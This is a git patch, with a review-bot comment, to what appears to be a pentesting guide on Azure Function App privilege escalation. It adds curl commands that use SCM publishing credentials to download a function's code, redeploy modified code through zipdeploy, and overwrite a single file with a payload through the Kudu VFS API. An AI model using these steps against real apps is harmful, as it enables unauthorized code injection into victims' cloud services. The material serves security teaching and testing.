From 7e4c12b7ff9b2e7ae2928e6d6989674bfaf6a2a0 Mon Sep 17 00:00:00 2001 From: Fudgedotdotdot <28399056+Fudgedotdotdot@users.noreply.github.com> Date: Wed, 10 Jun 2026 14:33:48 +0200 Subject: [PATCH] Clarified Microsoft.Web/sites/publishxml/action , Microsoft.Web/sites/basicPublishingCredentialsPolicies/write for functionapps --- .../az-functions-app-privesc.md | 36 ++++++++++++++++--- 1 file changed, 32 insertions(+), 4 deletions(-) diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md index 401adfe4d3..c007144daa 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md 
@@ -357,12 +357,40 @@ Then, you can access with these **basic auth credentials to the SCM URL** of you curl -u ':' \ https://.scm.azurewebsites.net/api/settings -v -# Deploy code to the funciton -zip function_app.zip function_app.py # Your code in function_app.py -curl -u ':' -X POST --data-binary "@" \ - https://.scm.azurewebsites.net/api/zipdeploy ``` +You can download, modify and upload new function code : + + +```bash +# download +curl -u ':' -X GET \ + https://.scm.azurewebsites.net/api/zip/site/wwwroot/ \ + -o current_function_code.zip + +unzip current_function_code.zip -d updated_code/ +cd updated_code/ +#... modify the function code +zip -r ../updated_function_app.zip . +cd ../ + +# upload +curl -u ':' https://.scm.azurewebsites.net/api/zipdeploy -X POST --data-binary @updated_function_app.zip -v +``` + +You can even upload a specific file : + +```bash +curl -u ':' \ + -X PUT \ + -H "Content-Type: application/javascript" \ + -H "If-Match: *" \ + --data-binary "@./my_local_payload.js" \ + "https://.scm.azurewebsites.net/api/vfs/site/wwwroot/hello-world/index.js" # example NodeJS file +``` + + + _Note that the **SCM username** is usually the char "$" followed by the name of the app, so: `$`._ You can also access the web page from `https://.scm.azurewebsites.net/BasicAuth`
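Review bot: the single-file PUT example in the second added block ships `-H "If-Match: *"` without saying why, and a reader who drops it will hit a 412 from the Kudu VFS API when the target file already exists; add a one-line comment such as `# If-Match: * lets the PUT overwrite an existing file (Kudu returns 412 otherwise)` next to that header. The same block also switches runtimes without warning: the lines this hunk removes packaged `function_app.py`, but the new PUT targets `site/wwwroot/hello-world/index.js` with `Content-Type: application/javascript`, so state that the path and content type must match the app's actual runtime stack (for a Python app it would be the `function_app.py` the page used before). Worth a caveat next to the VFS example too: it only works while `wwwroot` is writable, so on an app running from a package (`WEBSITE_RUN_FROM_PACKAGE`) the `/api/zipdeploy` route above is the one that still applies. Two style points: the lead-in sentences use a space before the colon (`new function code :`, `a specific file :`), which should be `code:` and `file:`, and the three added blank lines before `_Note that the **SCM username**` should be reduced to one.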